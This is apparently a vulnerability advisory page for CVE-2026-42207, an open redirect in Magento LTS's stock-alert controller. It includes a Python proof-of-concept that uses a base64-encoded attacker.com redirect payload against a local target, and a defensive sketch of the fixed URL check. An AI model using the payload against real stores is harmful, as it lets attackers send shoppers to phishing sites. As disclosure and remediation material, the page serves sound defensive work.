Security Vulnerability Report
CVE-2026-42207 CVSS 6.1 MEDIUM

Published: 2026-05-15 17:16:47
Last Modified: 2026-05-15 19:16:58

Description

Magento Long Term Support (LTS) is an unofficial, community-driven project that provides an alternative to the Magento Community Edition e-commerce platform with a high level of backward compatibility. Prior to 20.18.0, Mage_ProductAlert_AddController::stockAction() reads the uenc query parameter and passes it directly to $this->_redirectUrl($backUrl) without calling $this->_isUrlInternal(). When the supplied product_id does not match any catalog product, the server issues an unvalidated HTTP 302 redirect to whatever URL was provided as uenc. This vulnerability is fixed in 20.18.0.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Magento Long Term Support (LTS) < 20.18.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Exploit Title: Magento LTS Open Redirect
# Date: 2026-05-15
# Exploit Author: Analyst
# Vendor Homepage: https://github.com/OpenMage/magento-lts
# Version: < 20.18.0


def check_poc(target_domain):
    # Base64 encoded version of https://attacker.com
    # aHR0cHM6Ly9hdHRhY2tlci5jb20=
    # Magento uenc format often includes padding or specific structure, simplified here for PoC
    malicious_redirect = "aHR0cHM6Ly9hdHRhY2tlci5jb20="
    # Use a non-existent product ID to trigger the error path
    url = f"{target_domain}/productalert/add/stock/product_id/99999999/uenc/{malicious_redirect}/"
    try:
        response = requests.get(url, allow_redirects=False)
        if response.status_code == 302:
            location = response.headers.get('Location')
            if location and "attacker.com" in location:
                print(f"[+] Vulnerable! Redirecting to: {location}")
                return True
        print("[-] Not vulnerable or PoC failed.")
        return False
    except Exception as e:
        print(f"[!] Error: {e}")
        return False


if __name__ == "__main__":
    target = "http://127.0.0.1/magento"
    check_poc(target)
```
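As an added example (not code from this page or from the OpenMage project), the following Python sketch shows the decision the 20.18.0 fix restores: decode uenc the way Magento builds it and honour it only when it passes a store-prefix check modelled on _isUrlInternal(), falling back to the store home page for anything off-site, relative or undecodable. STORE_BASE_URLS, the function names and the sample URLs are assumptions made for the example; the PoC payload above is reused as the rejected input.

```python
import base64

# Constructed store base URLs for this example; a real store reads them from
# its configuration (Magento compares against the store's base/link URLs).
STORE_BASE_URLS = ("https://shop.example.com/",)


def magento_url_encode(url: str) -> str:
    """Encode a URL the way Magento builds uenc: base64 with '+/=' swapped for '-_,'."""
    return base64.b64encode(url.encode()).decode().translate(str.maketrans("+/=", "-_,"))


def magento_url_decode(data: str) -> str:
    """Inverse of magento_url_encode; plain base64 (as in the PoC payload) also decodes."""
    raw = base64.b64decode(data.translate(str.maketrans("-_,", "+/=")))
    return raw.decode("utf-8", errors="replace")


def is_url_internal(url: str, base_urls=STORE_BASE_URLS) -> bool:
    """Prefix check modelled on _isUrlInternal(): an absolute URL is internal only
    if it starts with one of the store's base URLs. The trailing slash on the base
    URL is what rejects look-alike hosts such as shop.example.com.attacker.com."""
    if "http" not in url:
        return False
    return any(url.startswith(base) for base in base_urls)


def resolve_back_url(uenc: str, default: str = STORE_BASE_URLS[0]) -> str:
    """Hardened redirect decision: the vulnerable stockAction() handed the decoded
    uenc straight to _redirectUrl(); here anything missing, undecodable or off-site
    falls back to the store home page instead."""
    if not uenc:
        return default
    try:
        back_url = magento_url_decode(uenc)
    except ValueError:  # binascii.Error is a ValueError subclass
        return default
    return back_url if is_url_internal(back_url) else default


if __name__ == "__main__":
    # The PoC payload (plain base64 of https://attacker.com) is refused...
    print(resolve_back_url("aHR0cHM6Ly9hdHRhY2tlci5jb20="))
    # ...while a genuine product page round-trips unchanged.
    print(resolve_back_url(magento_url_encode("https://shop.example.com/catalog/product/view/id/42/")))
```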

References

GitHub Security Advisory: https://github.com/OpenMage/magento-lts/security/advisories/GHSA-qpgq-5g92-j5q8
Weakness: CWE-601 (URL Redirection to Untrusted Site, 'Open Redirect')
